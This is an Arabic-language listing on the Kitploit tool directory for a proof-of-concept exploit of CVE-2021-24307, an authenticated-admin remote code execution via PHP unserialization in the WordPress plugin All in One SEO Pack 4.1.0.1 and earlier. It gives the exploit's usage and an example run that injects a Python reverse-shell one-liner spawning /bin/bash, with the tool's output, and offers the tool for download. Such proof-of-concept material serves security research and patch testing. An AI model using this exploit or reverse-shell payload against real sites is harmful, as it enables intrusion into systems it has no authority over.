Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — إثبات مفهوم لاستغلال CVE-2021-24307، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) للمسؤول المُصادَق في All in One SEO Pack <= 4.1.0.1 عبر إلغاء تسلسل PHP (unserialization)، مما يتيح تنفيذ أوامر عشوائية. | Kitploit
أدوات/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

إثبات مفهوم لاستغلال CVE-2021-24307، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) للمسؤول المُصادَق في All in One SEO Pack <= 4.1.0.1 عبر إلغاء تسلسل PHP (unserialization)، مما يتيح تنفيذ أوامر عشوائية.

عرض المستودع
4218منذ 4 سنواتلم تتم المراجعة بعد
مشاركة

ثغرة تنفيذ الأوامر عبر إلغاء تسلسل PHP في إضافة All in one SEO pack (CVE-2021-24307)

إثبات مفهوم بسيط لثغرة تنفيذ أوامر عن بُعد (RCE) عبر حساب مسؤول مُصادق في إضافة AISEO <= 4.1.0.1، مقدَّم كمثال.

الشرح الكامل هنا: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

طريقة الاستخدام:

php exploit.php url login password php_command arguments [proxy]

مثال:

└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 authenticated admin RCE --
-- Exploit by Vincent MICHEL (@darkpills) --

[+] Authenticating to wordpress http://wordpress/
[+] Getting WP REST API nonce
[+] Nonce found: 6aeb9ddf05
[+] Generating POST payload to execute command: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] Uploading ini file with import settings
[+] Done! Check the result somewhere (blind command execution)
تنزيل الأداة